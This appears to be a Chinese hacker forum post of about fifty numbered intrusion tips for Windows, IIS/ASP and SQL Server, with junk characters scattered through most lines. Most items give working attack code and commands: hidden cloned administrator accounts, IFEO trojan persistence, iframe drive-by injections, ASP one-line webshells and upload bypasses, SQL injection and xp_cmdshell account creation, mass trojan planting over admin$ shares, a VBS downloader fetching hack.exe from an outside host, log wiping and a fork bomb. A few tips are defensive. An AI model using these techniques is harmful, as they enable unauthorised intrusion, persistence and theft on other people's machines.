1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) W1 @. M5 @8 v. t3 v. `- I7 l1 p
cacls C:\windows\system32 /G hqw20:R
* T, V. _7 r6 U# @ w/ }# {思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入( F/ [# g K6 C$ T( S/ D
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
x3 _, F' b0 j o# E. ]4 o& Q2 z" b! k1 y5 \2 u( ^/ g0 k, y, O
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% T9 X% g& j3 z0 T$ E( _+ R6 \" {; m
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
! D; ]; c/ Y" @+ ^. ~0 W7 ?* `9 V: T
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) M* r1 V2 H5 Q$ W/ U6 k# Y
4 \/ }& B6 c: g7 J. n. k# a5、利用INF文件来修改注册表& d; `4 x7 z8 G& f/ h3 r
[Version]9 w3 L$ {& H3 R3 X
Signature="$CHICAGO$"
& X9 G9 v" C2 U9 t9 ^. i[Defaultinstall]
: ?5 O* J5 ?4 f/ D: n; ^addREG=Ating) G: v# T9 g9 p( ^
[Ating]
% U X$ O, s9 k6 C3 M( f3 JHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"/ j% ^2 y6 [4 L- e5 o1 f
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:+ z0 s+ O2 M3 j# Z+ K3 i: s
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径* b/ G+ \$ x, U; I8 e2 L
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 g. S9 }% ^' c& P
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU1 l; T: l" f: q" q% x0 `, D0 m
HKEY_CURRENT_CONFIG 简写为 HKCC4 I+ l3 Q4 p5 q5 Y- E
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值! b- c9 v, y% j3 [1 Z; T3 h% F( k/ \
"1"这里代表是写入或删除注册表键值中的具体数据1 D) R3 l+ M* B/ s2 Z9 f
" N9 `5 Z1 E: ^1 }( O7 {) n% O0 w
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
B% @( O* q4 S# J6 B# O1 R& n多了一步就是在防火墙里添加个端口,然后导出其键值) H4 N X+ v' d, j9 k5 e0 _
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
9 ]# w' B4 [0 z0 \- r
* S- T- Q- O7 e5 q4 N+ c; N7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽* I2 E8 w! t+ h7 i& O: f
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
) H. r( F' f% Z, Q2 q( S$ ?) w" B% Q; y4 t* _8 Y2 N
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# x# h8 l; ^, {2 c, g! d
$ i7 p$ }8 k% N! N9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
. E; c9 W# Y: o+ ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。8 T3 I& M/ f4 F* Z7 v: X! o
! I) F% ]! @' h) k% x4 a( d" o
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”% a: V8 x$ c; p- G6 h6 M+ u
+ @; e, r, `& |
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" n. X9 O8 Q2 F$ |用法:xsniff –pass –hide –log pass.txt9 _% Y- B0 W: c. f& c
* ]* D0 c, ]+ Y- s! q5 B
12、google搜索的艺术
) e) V- O# b9 ~ {搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
; V( W5 r7 X9 ?9 R, t3 k* m( h* M0 D或“字符串的语法错误”可以找到很多sql注入漏洞。: q4 m) H" c ^! S P% G
v$ @! M- F) x0 x! ^/ @/ t. u13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。. f3 o8 d. _# t1 j! a3 {5 x& E: B
7 d$ V' j% v% q$ e: \$ k14、cmd中输入 nc –vv –l –p 1987
$ E1 Y! W9 j* {做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
2 F6 q. u0 B% H+ c- ]+ I9 P1 L
: H' t# o5 e! ]2 G9 m0 k' g15、制作T++木马,先写个ating.hta文件,内容为
5 s$ U/ t5 ~" ?: e<script language="VBScript">
* {: i# q' d" Uset wshshell=createobject ("wscript.shell" )
: |8 S( F1 o+ s6 Ca=wshshell.run("你马的名称",1)
c# A/ O/ J3 g- k) D% Zwindow.close3 b0 q! l- \5 Z1 Q" N! \
</script>
( d1 p7 H* L2 [/ S+ K( m再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) s; g3 U1 p# ]. H
' X- m1 W8 }( N16、搜索栏里输入8 q0 }# Z& ]# }6 h* Z
关键字%'and 1=1 and '%'='* K' s% g5 f, L( d9 u( }6 W
关键字%'and 1=2 and '%'='' O6 J' f4 r6 Q3 W" q$ W# k& d. _
比较不同处 可以作为注入的特征字符/ R9 j. m! d, ^9 |; z+ `2 t7 Q- x. A
5 y( x" t [+ l( E* X
17、挂马代码<html>
, B2 q( Y' A |- [8 V. I# N<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>! N: N; u9 S: `' }
</html>* ^6 D6 @0 P/ D0 p1 t
4 g' F% J2 ?+ ~3 R! o k/ W
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,$ _* r* k, u1 X
net localgroup administrators还是可以看出Guest是管理员来。
4 ^( r3 s4 ]: g7 L( V; F* m0 ]& f) {! N- U1 |
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等4 {+ G/ ]- a# c! F+ M+ Q: ?
用法: 安装: instsrv.exe 服务名称 路径! {' U$ Y) u5 w/ Y: l6 R
卸载: instsrv.exe 服务名称 REMOVE
8 u" k# o% q1 p- L4 c, F8 Y( B1 h' Z
) Q3 ]! V& p c5 n9 L) _% q3 }21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
! p8 ]% K1 t* C; \不能注入时要第一时间想到%5c暴库。' e3 C( m0 c9 c% E
7 p- [6 x% u0 k7 b. H! N
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~' n6 k4 Y7 E. D2 N( F
( O4 y/ k' e' P* R8 c
23、缺少xp_cmdshell时8 y# v) i+ `6 w% L
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
& a& z# o5 I% h# ^假如恢复不成功,可以尝试直接加用户(针对开3389的)# b9 x7 {% b$ i5 x, M2 D5 k& x" ~ v
declare @o int
* Z- }* i7 j! j/ z) Mexec sp_oacreate 'wscript.shell',@o out
1 X, q! n* u: n3 hexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员1 H2 C7 g- x9 a! ]% A
' F0 m! m, R; c/ j- y. C J0 }6 [24.批量种植木马.bat0 |8 Q( @' N/ ^# \2 T! ]9 R
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
0 y6 O1 p5 w7 Rfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ u; Y0 |6 {( ]7 r
扫描地址.txt里每个主机名一行 用\\开头
. c- ? m# L) `$ w, x* v7 M
4 a$ B2 y( D. S7 t' G25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。" d. `' f8 E6 m+ [. P) _/ U2 b
% V+ M& S- N# I' J2 ^5 P26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
8 F1 S6 ]% H- b& X将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.# G2 r* a( k4 r, m3 s: r! O
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" O; G! @4 `. Y. f! b, m1 L7 y* r1 u
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP* i8 e" G/ s: j
然后用#clear logg和#clear line vty *删除日志* V2 |, Y( m# u$ L
3 C' F+ z6 b& V5 r
28、电脑坏了省去重新安装系统的方法& l! p( H0 u F
纯dos下执行,6 ]5 _( B5 v+ ^& B
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config1 d+ q3 N5 k; A* b P: J# Q& h0 L
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
' i5 |4 } z6 P, @3 C3 F7 ~7 H6 Y1 P4 a/ s7 w! d r9 e& L9 |
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" M% t9 @$ B% ^# `, {. ^( oHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip/ U3 K* A1 S0 E6 O; S; P4 i6 S+ N0 y! d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 V+ R3 @9 c; e' d, B# rHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" d. [+ I& o1 m2 O3 g- @' `
分别用) [3 H( ?8 i- Q3 f
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& K8 N1 v0 R8 W) M" _regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 _" D4 z# j+ z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 b6 O3 q2 y: D% {8 F+ b! i
命令来导出注册表项& O3 C, D9 j1 e$ e0 X6 s& q1 E; l
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% N* V! j7 a1 l* ]
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* d9 S: c5 T" h
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 Y% |! E- Q, r9 R. s! \6 ?+ Q1 i( h2 q+ M9 _& O) e
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* Y4 i% R. `. n1 f. w! N% @' D. L& Q8 nSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3: R6 e0 c J- D' I
4 h2 `- o: T' a31、全手工打造开3389工具" J0 J8 H, c! d) c+ p0 }: b3 L( S: J
打开记事本,编辑内容如下:& |1 h) L; T- A7 w, z' A A
echo [Components] > c:\sql
( e* s) S* P3 Z* e. [echo TSEnable = on >> c:\sql# L: W: m7 q. }' q
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
: H, c8 ^) c0 g/ [- |& m7 _编辑好后存为BAT文件,上传至肉鸡,执行
, r% J5 j" k. g0 L; d
* B3 L6 E( n7 t, L/ ^2 n! j32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马4 v5 V+ H( p3 C" f
) Q2 T. E7 `' a4 C, ^& g6 S33、让服务器重启4 a4 h& E( G' }/ D2 f3 [) D
写个bat死循环:
( ?/ c* w1 Q: T, Y' p@echo off+ e( E$ [' _7 S: u$ J1 @' t! H
:loop10 M# U" ], r Y
cls' j5 W g, n* s3 S" u
start cmd.exe
2 Y4 s( V1 o! hgoto loop1, ^ w2 e8 E' w/ M) c8 e: g8 Z+ e: s
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 F( e& O/ f/ ^: o( u6 t7 B, _" Y# x! {1 t5 H
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
) V! X- E1 g/ p: D- I" ^@echo off
* \3 R7 r$ [" D* ydate /t >c:/3389.txt0 b' R2 o, Z; c$ c0 J
time /t >>c:/3389.txt
8 p8 L9 P0 Z' L) X* ^+ d) E. Xattrib +s +h c:/3389.bat6 [ ~* E' K- d. ]- h
attrib +s +h c:/3389.txt
7 o/ X! O3 {. b: @0 V' Z" p+ H! J7 ~netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 y% F. Y% r& ^# W+ k# ~2 Y% o1 {. v; c& V并保存为3389.bat: r6 n) w2 i1 y U9 [5 N
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号7 ?% q! L8 P. B* m7 S
/ m5 |3 F9 X2 {- t0 T1 f9 X5 o; N1 i35、有时候提不了权限的话,试试这个命令,在命令行里输入:/ I( S5 H% N( Q$ l8 v% Q
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)/ m9 j* J0 r+ i
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
# F, Q) B, h) o7 n& d5 n+ c1 Q) C g# g" D* T+ n
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
9 K. A: j; M% U9 {& ^8 ]echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 s. a6 b% N# _$ ^. z8 d$ zecho 你的FTP账号 >>c:\1.bat //输入账号0 |1 V! j( U% T
echo 你的FTP密码 >>c:\1.bat //输入密码
+ b8 o; V) r' \( O2 oecho bin >>c:\1.bat //登入
0 e h* r( l6 iecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) s7 Q2 P, c9 M2 ?& h2 e
echo bye >>c:\1.bat //退出
: |; s# U7 l* p/ l# y6 c5 U8 G然后执行ftp -s:c:\1.bat即可& \8 L& c p) J# `+ A! C9 ^, z, Y
& O3 Y9 M1 L$ b+ J+ W. X37、修改注册表开3389两法
4 `7 T. n& F# k6 r3 d+ ]* V1 d(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表* t2 Y3 ^+ D: M2 B Q; l2 A3 R
echo Windows Registry Editor Version 5.00 >>3389.reg
, _9 n- \0 X& D% O- gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg# M! @2 }7 c3 s5 W" H' N" N/ l6 _; o
echo "Enabled"="0" >>3389.reg
/ I- w+ O( q6 pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows7 h3 }' I: Z# F& N$ o6 i; |
NT\CurrentVersion\Winlogon] >>3389.reg# ^+ J3 s4 l Z1 f
echo "ShutdownWithoutLogon"="0" >>3389.reg# R4 f) m, m+ v \! _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]4 A& O6 u$ R6 q, a7 _( J/ G+ L3 ?
>>3389.reg+ C5 x9 K. Q' M+ q& C" \! u7 z
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ n B2 F1 B L- K; W; Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' j/ c# t1 f9 G
>>3389.reg( G/ L/ I9 K9 P+ S9 m
echo "TSEnabled"=dword:00000001 >>3389.reg
2 q! @( f' Y" t* g& N. Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg; {6 o1 [% m$ H
echo "Start"=dword:00000002 >>3389.reg
* a, ^, N* D8 u$ d; recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]6 F, u; m0 R5 U
>>3389.reg; ?( A+ i" K G P
echo "Start"=dword:00000002 >>3389.reg
) @/ F8 ^4 k- ?, |' p+ [' aecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg0 `; X7 Y) o k+ t
echo "Hotkey"="1" >>3389.reg' B1 O2 B X; w; y% G/ ?) w- K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ _) U/ h0 [ c8 P7 T3 sServer\Wds\rdpwd\Tds\tcp] >>3389.reg8 ^( o" |, J7 i) v: g
echo "PortNumber"=dword:00000D3D >>3389.reg7 ?) A* y. K, \8 C* a# j2 |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 }$ h# o2 g3 X. T% e7 o. W4 NServer\WinStations\RDP-Tcp] >>3389.reg
- z( z. r# R# h; o1 yecho "PortNumber"=dword:00000D3D >>3389.reg0 v0 Z5 o# h& }/ P5 b
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
6 M6 [2 D- n- E/ N, _, Z(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)" D1 p( g/ i6 s w; L+ [
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
% W0 @/ k# P! {9 V4 I(2)winxp和win2003终端开启
7 A, {& ~) y% h$ C$ X$ Y用以下ECHO代码写一个REG文件:. M5 I& p9 {/ B/ M6 Q, G+ K+ Q
echo Windows Registry Editor Version 5.00>>3389.reg
6 T" `* X% K; M6 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 u9 y6 c, X1 M2 J1 X
Server]>>3389.reg J I0 V S: f# k; O
echo "fDenyTSConnections"=dword:00000000>>3389.reg
0 F# e3 P8 H9 w. ?( s1 f, Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* \' N2 }4 `: G6 WServer\Wds\rdpwd\Tds\tcp]>>3389.reg- d* D. t- G$ f
echo "PortNumber"=dword:00000d3d>>3389.reg! t( F5 W# D5 q" m) Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ i. W! C! p( K7 M% V% YServer\WinStations\RDP-Tcp]>>3389.reg
0 T1 k* J- I9 n |6 T1 A/ s# Secho "PortNumber"=dword:00000d3d>>3389.reg
# k4 g2 k2 f# ~然后regedit /s 3389.reg del 3389.reg; b i5 z# E2 r5 t% R$ |+ \* ?
XP下不论开终端还是改终端端口都不需重启4 \4 g7 Y# r( I
4 x; ]( K# Y. D+ y- v38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" N3 q( H- z3 O- ]用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
4 o. P7 O5 `$ g3 _& S4 b7 N0 `4 L8 @; R2 Q+ @( q
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
: k( g0 q% ?( K: C4 M(1)数据库文件名应复杂并要有特殊字符; K& R- M8 F5 G& i' r
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源4 V' t3 H0 c( |9 y+ b
将conn.asp文档中的
( q: `- X/ s3 O- r: ]. T' jDBPath = Server.MapPath("数据库.mdb")2 _) H5 x6 Q9 G. N3 R- y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
8 Y1 F4 D4 _7 s \) {3 Y- n Q, W9 e2 A+ ]
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置* K( Z+ W/ z/ h. t
(3)不放在WEB目录里5 C# C) H: ]; H: u! A H
2 F2 o# ^+ N2 W! i40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉) t& o- S4 D' v! }( t+ @$ E' e% S8 Q9 J
可以写两个bat文件: c& |* X/ ]4 u
@echo off
* I& Z9 ^) u) b$ c; v7 L7 X: C: C@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe9 |- v& B3 b1 E
@del c:\winnt\system32\query.exe' K+ y; T3 h( M: X7 H
@del %SYSTEMROOT%\system32\dllcache\query.exe* s- r. p, E8 f3 T
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的7 `! |) c$ B! d8 F
/ R: l4 m# {$ W@echo off
/ i1 A( e! c2 n" t5 h@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe' s5 ^& Z' B8 c: i- N* H
@del c:\winnt\system32\tsadmin.exe3 _# M# u! S9 J! ^9 C
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex1 @1 G( V6 E, H+ }, ^. ]; v
8 q: R# O8 _9 P2 |41、映射对方盘符: s1 j$ B% g v
telnet到他的机器上,3 A* z) D$ s% p, [& K/ p6 v: B/ ~+ s
net share 查看有没有默认共享 如果没有,那么就接着运行2 L0 g( D& ~; l/ }5 b: \6 r
net share c$=c:4 x) f9 P, R2 e) t' i8 O
net share现在有c$
5 r, A# ^2 {' g. T6 s1 `5 y: J在自己的机器上运行
8 O& h0 x [" V' q" Enet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K8 ~# B0 {9 h8 `
9 G/ D" q) o# \& a k3 h( u6 m5 I42、一些很有用的老知识% F! b: \2 v5 k* V+ i
type c:\boot.ini ( 查看系统版本 ). q! {0 P* m4 C% g- \; q
net start (查看已经启动的服务)' G' n: R) E# M) ^2 \! U( N
query user ( 查看当前终端连接 )
% W4 j6 w# u% Z* ^* y* enet user ( 查看当前用户 )
" _& S7 y- s- v) G7 \/ W Wnet user 用户 密码/add ( 建立账号 )
! b5 g! i; {' _0 K0 N( _# _net localgroup administrators 用户 /add (提升某用户为管理员)
$ ^6 |! k7 |6 }+ V4 [' Eipconfig -all ( 查看IP什么的 )
! b, c: {) L$ N, }) ?' |& j8 Znetstat -an ( 查看当前网络状态 )
7 [. y8 ^ _" ~8 U1 v" l" y% f* Tfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)) q/ [# k: L* C& {3 h7 v
克隆时Administrator对应1F44 E9 L- {6 x$ }& }/ G" b! D
guest对应1F5
0 ^! Q5 n8 p3 [6 Ptsinternetuser对应3E8
; B( E0 o) _9 n2 w4 K* ^* ~5 ?, [0 j3 n5 T* ~
43、如果对方没开3389,但是装了Remote Administrator Service5 M# C$ a! N+ g6 _) @- A
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
2 l& U* ?8 b- k% n; C解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
: j) s, a0 M% {6 u7 R, C5 e3 k; W先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) C3 T: \9 j8 [) W# S$ |: z, B/ m* ^. f
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
5 `7 M9 t7 v! \: m) I6 t1 g/ Y本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)' Y( K7 Y/ o# P, r7 a+ K# K6 j# p
; P" q2 h: _% D& z5 h# z; r2 ]
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. d; R+ Q/ Q4 h' }echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
$ U' O( I& x2 X; o+ q7 V3 y: P^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
) \! Z% A3 U# e' Z6 n/ `$ s; BCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ q: T* Y n" m, v1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
0 b2 ]& C! K5 s, I$ ](这是完整的一句话,其中没有换行符)/ O; w8 s% o+ g% }- r
然后下载:$ O9 ], K- J6 |* g7 H- e
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
' A" R+ U' s) o2 w: ^* l3 d- S3 k
46、一句话木马成功依赖于两个条件:3 {, p6 L! C! R* N
1、服务端没有禁止adodb.Stream或FSO组件
' I& k P4 ]0 S3 b+ Y) j2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
1 b# v0 ]. P+ d C6 Q) \. B+ A0 h
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
# @+ H3 @' a+ D$ e;alter database utsz set RECOVERY FULL--- K. C. N3 x$ X* C9 y4 ?
;create table cmd (a image)--" H" \1 g' p8 `0 P: z( E( Y. E
;backup log utsz to disk = 'D:\cmd' with init--2 ?# e9 y$ E* ~" T
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--- J! b, t+ Z, S4 }1 x( x) A
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& y {3 {! M7 C
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。, `9 [* [6 f/ L3 M( r0 W4 F
" U+ B, E% i; ?/ K A& \
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:& q8 Q% s6 R" l. B0 b- b( Z, z" F
; E7 L) e7 ?- o, ^7 {8 i/ @
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
- P( C7 H! p. h6 Y# y; P) m所有会话用 'all'。
) _8 E# W) i3 C7 C6 ? S: c+ _8 W-s sessionid 列出会话的信息。
) B! X, I/ U( l. x6 S, D-k sessionid 终止会话。
$ R2 p* \) h$ \$ g* f-m sessionid 发送消息到会话。
9 S6 {$ z# j# u6 ~- s f" A5 t( Y8 g& u) j
config 配置 telnet 服务器参数。
" C3 ?7 O$ F) U( ?$ {: K3 H
$ t4 c* J- r% tcommon_options 为:- e# R) f. o9 S% x( w5 D$ W) K0 w
-u user 指定要使用其凭据的用户
- B! d- p- W! o4 w6 D m6 ?0 x" ^-p password 用户密码
0 u3 v" g6 Q7 _1 n
% o8 C1 v. J$ ?" ^" y2 wconfig_options 为:
$ k7 g- c1 Q Y/ O5 i, k, R( V# Xdom = domain 设定用户的默认域0 T% _0 T( _3 T
ctrlakeymap = yes|no 设定 ALT 键的映射, x- a7 }& o* A; R" \1 { a- ? w& o. a
timeout = hh:mm:ss 设定空闲会话超时值4 w2 ], j- w* P! ]3 i
timeoutactive = yes|no 启用空闲会话。
8 j9 A3 S. Q3 G u8 dmaxfail = attempts 设定断开前失败的登录企图数。 x8 b! h6 [( v8 e* A
maxconn = connections 设定最大连接数。
* p$ n& U2 X3 V5 j0 Q& u: M Uport = number 设定 telnet 端口。
$ r% X0 U6 X: v+ k4 \sec = [+/-]NTLM [+/-]passwd1 e1 {0 P( p" f
设定身份验证机构5 y) L1 `& u: y
fname = file 指定审计文件名。
1 j; h' G6 t. A+ ?- D6 o ~fsize = size 指定审计文件的最大尺寸(MB)。
4 g9 x, t1 G0 W1 L' r: l7 c' a9 e4 w# jmode = console|stream 指定操作模式。
9 Z, a0 D& G1 F2 b" v2 tauditlocation = eventlog|file|both
" ~% r4 U! u( T& q n: k" _; H$ _指定记录地点
/ [/ R' a9 s8 A; E' Q. r% baudit = [+/-]user [+/-]fail [+/-]admin% ], R8 |* i7 I1 w% W
' v7 `2 r1 H0 k
49、例如:在IE上访问:( _! g% ]0 i; p) I" z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/4 T* O' u3 O8 ~
hack.txt里面的代码是:
) r, @* J, C4 c* N: w# j<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 ~' E" q9 W6 l% ]1 d* |把这个hack.txt发到你空间就可以了!! c" j& ~! x1 y' A
这个可以利用来做网马哦!
" r# i3 ]- ?2 x: n8 u0 z: d4 P
7 n, U# K% Z( o" g$ m5 R50、autorun的病毒可以通过手动限制!
C3 i8 \' G2 H& S% K1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
6 N8 p# I3 Q, s0 w; a" Q2,打开盘符用右键打开!切忌双击盘符~1 L6 |1 C0 W* Y
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!4 d5 Q5 e4 Y2 f e7 C% V# v8 K
4 K. N3 F3 i. }" [, i) B
51、log备份时的一句话木马:
& R# H3 \' {+ g/ e! Da).<%%25Execute(request("go"))%%25>
4 ?! Z- x6 O9 P& T, u/ g5 N1 cb).<%Execute(request("go"))%>
- c; d) P; F, s3 {3 t. Q: X* {. ~$ Qc).%><%execute request("go")%><%
9 N/ `/ w# Z* A. w2 N) Bd).<script language=VBScript runat=server>execute request("sb")</Script>. a& } t: ~* t/ ]) `9 I' d& H! ~. q
e).<%25Execute(request("l"))%25>
) N+ B$ A' u4 Mf).<%if request("cmd")<>"" then execute request("pass")%>
: }" ^4 O" O6 {% U
' U9 v4 \3 A2 p/ B- }3 T6 G- d52、at "12:17" /interactive cmd, m1 M. y! ]& Z# g( a
